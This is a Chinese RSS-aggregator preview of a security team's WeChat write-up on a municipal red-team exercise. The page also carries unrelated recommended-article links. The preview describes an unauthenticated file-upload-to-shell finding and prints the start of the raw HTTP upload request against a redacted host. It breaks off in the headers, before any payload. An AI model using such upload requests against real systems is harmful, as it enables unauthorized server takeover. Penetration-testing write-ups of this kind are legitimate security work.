专栏名称: 渗透安全团队

每个人都有迷茫和快速成长的时期。做技术需要静下心来，两耳不闻窗外事，一心只读圣贤书。一段时间以后就发现窗外那些吵杂的声音早已经没法触动你的心思，这时候就谁也挡不住你成长了。

我也要提交微信公众号

今天看啥

微信公众号rss订阅, 微信rss, 稳定的RSS源

微信公众号RSS订阅方法

B站投稿RSS订阅方法

微博RSS订阅方法

微博搜索关键词订阅方法

豆瓣日记 RSS订阅方法

地市护网爽拿上万分，一次看个爽(文末抽奖)

渗透安全团队 · 公众号 · · 2024-08-25 19:13

文章预览

正文部分上上个月参加了某个地级市的攻防演练，将小部分报告合并分享出来（想要抽奖的师傅直接拉到文末就行啦~~）(打码打到我想死~) 某公司未授权+文件上传getshell http://xxx.xxx.xxx:9081 ‍ 文件上传getshell POST /api/portal/v1/file/upload?lang=zh_CN HTTP/ 1.1 Host: xxx.xxx.xxx : 9081 Content-Length: 1230 Accept: application/json, text/plain, * /* Tenant-Code: WS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryytBWAvbx7URctPS3 Origin: Referer: Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: _cmslang=zh_CN; sajssdk_2015_cross_new_user=1; sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%2218fccb0d291acc-0d8cd14b802cf3-4c657b58-1395396-18fccb0d2921854%22%2C%22first_id%22%3A%22%22%2C ………………………………

原文地址：访问原文地址
快照地址：访问文章快照
总结与预览地址：访问总结与预览

分享到微博

推荐文章

香港商报 · 一周港艺 | 来中环新展，探寻跑马地百年历史↓

2 天前

康石石 · 去英国读插画的话，哪个学校更好就业？

3 天前

中国上海国际艺术节 · 媒体聚焦 | 传统文化时尚表达面向世界的一堂中国文化“公开课”

6 天前

世纪新能源网 · 65%股权！央企转让光伏企业资产

4 月前

摩点 · 众筹倒计时！九百年前佚失的国宝合集被焚毁的帝王书房——《宣和宝鉴》

2 月前

前程无忧51job · 这道面试必答题，回答不好Offer不保！

1 月前